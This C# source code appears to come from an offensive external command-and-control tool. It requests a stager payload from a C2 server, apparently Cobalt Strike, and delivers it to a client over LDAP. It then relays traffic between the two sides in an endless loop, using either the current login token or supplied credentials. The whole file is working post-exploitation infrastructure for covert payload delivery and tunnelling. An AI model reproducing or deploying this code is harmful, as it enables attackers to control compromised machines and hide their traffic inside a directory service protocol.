/// <summary>
/// Requests a stager from the C2 endpoint behind <paramref name="Relayer"/> and returns the frame that comes back.
/// The request is four separate ASCII messages sent in this order: "arch=x64" or "arch=x86",
/// "pipename=" followed by <paramref name="pipename"/>, "block=100", and "go". These literals are
/// the observable signature of a stage request on the relay link (whether the transport wraps or
/// encrypts them is not visible from this method).
/// </summary>
/// <param name="Relayer">Already-connected transport to the C2 server; only Send and ReadFrame are used here.</param>
/// <param name="pipename">Pipe name forwarded verbatim in the "pipename=" message.</param>
/// <param name="isX64">Selects "x64" (true) or "x86" (false) for the "arch=" message.</param>
/// <returns>The frame returned by <c>Relayer.ReadFrame()</c> after a fixed 200 ms pause.</returns>
public static byte[] getStage(Transport.Relayer Relayer, string pipename, bool isX64)
{
    var arch = isX64 ? "x64" : "x86";
    Misc.WriteGood(string.Format("Requesting stager..."));
    // Each parameter is sent as its own message; the trailing "go" terminates the request.
    Relayer.Send(Encoding.ASCII.GetBytes("arch=" + arch));
    Relayer.Send(Encoding.ASCII.GetBytes("pipename=" + pipename));
    Relayer.Send(Encoding.ASCII.GetBytes("block=100"));
    Relayer.Send(Encoding.ASCII.GetBytes("go"));
    // Sleep a little so the TS can process the request
    System.Threading.Thread.Sleep(200);
    // Single blocking read; no timeout or retry is applied here.
    byte[] payload = Relayer.ReadFrame();
    // NOTE(review): Server() in this file treats ReadFrame() as nullable; a null here would
    // throw a NullReferenceException on payload.Length below.
    Misc.WriteGood(string.Format("Received stager ({0} KB)", payload.Length / 1024));
    return(payload);
}
/// <summary>
/// Handles the logic for communicating with the client over LDAP and transporting it to our C2 server.
/// Order of operations: open the relay socket to SERVER_IP:SERVER_PORT, open and test the LDAP
/// connection, fetch a stager via <c>Stage.getStage</c>, push it over LDAP, then poll both sides
/// in an endless loop, forwarding whatever arrives on one side to the other.
/// </summary>
/// <remarks>
/// SERVER_IP, SERVER_PORT, integratedAuth, username, password, domain, IsClient and UseLDAPS are
/// fields declared outside this method. <c>run</c> is never set to false, so the loop only ends
/// when the process exits or an exception escapes; both sides are polled every 50 ms while idle.
/// </remarks>
static void Server()
{
    // amount of sleep between polling
    int sleepInterval = 50;
    // connect to external C2
    Core.Transport.Relayer Relayer = new Core.Transport.Relayer(SERVER_IP, SERVER_PORT);
    if (Relayer.IsConnected)
    {
        Misc.WriteGood(string.Format("Connected to {0}:{1}", SERVER_IP, SERVER_PORT));
    }
    else
    {
        Console.WriteLine("[-] Cannot connect to {0}:{1}", SERVER_IP, SERVER_PORT);
        return;
    }
    // Initiate LDAP connection: integrated (current token) or explicit credentials from the
    // username/password/domain fields, depending on integratedAuth.
    Core.LDAP LDAPConnection = integratedAuth ? new Core.LDAP(IsClient, UseLDAPS) : new Core.LDAP(username, password, domain, IsClient, UseLDAPS);
    if (!LDAPConnection.TestLDAPConnection())
    {
        Console.WriteLine("[-] Cannot connect to LDAP with the information provided.");
        return;
    }
    // AutoDiscover is expected to print its own failure message; nothing is logged here on false.
    if (!LDAPConnection.AutoDiscover())
    {
        return;
    }
    // receive stager from C2 (pipeName and isX64 are filled in by the LDAP object, presumably by
    // AutoDiscover above — not visible from here)
    var payload = Stage.getStage(Relayer, LDAPConnection.pipeName, LDAPConnection.isX64);
    // NOTE(review): getStage returns whatever ReadFrame() produced; a null payload would throw on .Length here.
    Misc.WriteGood(string.Format("Payload received. Payload size: {0}KB", payload.Length / 1024));
    // Send payload over LDAP to third party client
    Misc.WriteGood(string.Format("Sending payload over LDAP..."));
    LDAPConnection.Send(payload);
    // run indefinitely (run is never cleared)
    bool run = true;
    // readController is set once data has been pushed toward the C2 and cleared once a reply
    // frame has been relayed back; while it is false the Relayer read below is skipped entirely.
    bool readController = false;
    do
    {
        // Handle LDAP connection: poll for data from the LDAP side
        byte[] data = LDAPConnection.Receive();
        if (data != null)
        {
            Misc.WriteGood(string.Format("Relaying {0} bytes from LDAP to CS", data.Length));
            // Forward to the C2 over the relay socket
            Relayer.Send(data);
            readController = true;
        }
        else
        {
            System.Threading.Thread.Sleep(sleepInterval);
        }
        // Wait for CS / LDAP
        if (!readController)
        {
            continue;
        }
        // Handle CS connection: read one frame and push it back over LDAP
        data = Relayer.ReadFrame();
        if (data != null)
        {
            Misc.WriteGood(string.Format("Relaying {0} bytes data from CS to LDAP", data.Length));
            LDAPConnection.Send(data);
            readController = false;
        }
        else
        {
            System.Threading.Thread.Sleep(sleepInterval);
        }
    } while (run);
}